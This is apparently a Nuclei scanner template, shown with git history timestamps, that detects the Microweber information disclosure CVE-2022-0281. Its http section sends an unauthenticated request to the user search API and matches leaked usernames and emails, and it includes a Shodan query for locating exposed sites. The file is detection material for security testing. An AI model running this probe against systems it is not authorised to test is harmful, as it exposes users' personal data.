nuclei-templates/http/cves/2022/CVE-2022-0281.yaml

49 lines
1.7 KiB
YAML
Raw Normal View History

2022-02-06 05:28:32 +00:00
id: CVE-2022-0281
info:
name: Microweber Information Disclosure
author: pikpikcu
severity: high
description: Microweber contains a vulnerability that allows exposure of sensitive information to an unauthorized actor in Packagist microweber/microweber prior to 1.2.11.
2023-09-27 15:51:13 +00:00
impact: |
Successful exploitation of this vulnerability can lead to the exposure of sensitive data, such as user credentials or database information.
2023-09-06 11:59:08 +00:00
remediation: |
Apply the latest security patch or update provided by the Microweber CMS vendor to fix the information disclosure vulnerability (CVE-2022-0281).
2022-02-06 05:28:32 +00:00
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2022-0281
- https://github.com/microweber/microweber/commit/e680e134a4215c979bfd2eaf58336be34c8fc6e6
- https://huntr.dev/bounties/315f5ac6-1b5e-4444-ad8f-802371da3505
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2022-0281
cwe-id: CWE-200
2023-10-14 11:27:55 +00:00
epss-score: 0.0051
epss-percentile: 0.73907
2023-09-06 11:59:08 +00:00
cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:*
metadata:
max-request: 1
2023-07-11 19:49:27 +00:00
vendor: microweber
product: microweber
2023-09-06 11:59:08 +00:00
shodan-query: http.favicon.hash:780351152
tags: cve,cve2022,microweber,disclosure,huntr
2022-02-06 05:28:32 +00:00
http:
2022-02-06 05:28:32 +00:00
- method: GET
path:
- "{{BaseURL}}/api/users/search_authors"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"username":'
- '"email":'
- '"display_name":'
condition: and
2023-07-11 19:49:27 +00:00
- type: status
status:
- 200
# digest: 4a0a0047304502205eb848a2373405e611adc80692a877328a44de111548c6095cee617cb82d1393022100bca30d0b5d22a9bd4d35ea5f5397993864fbb3b2d27e4a3e15e097e1d5b33eec:922c64590222798bb761d5b6d8e72950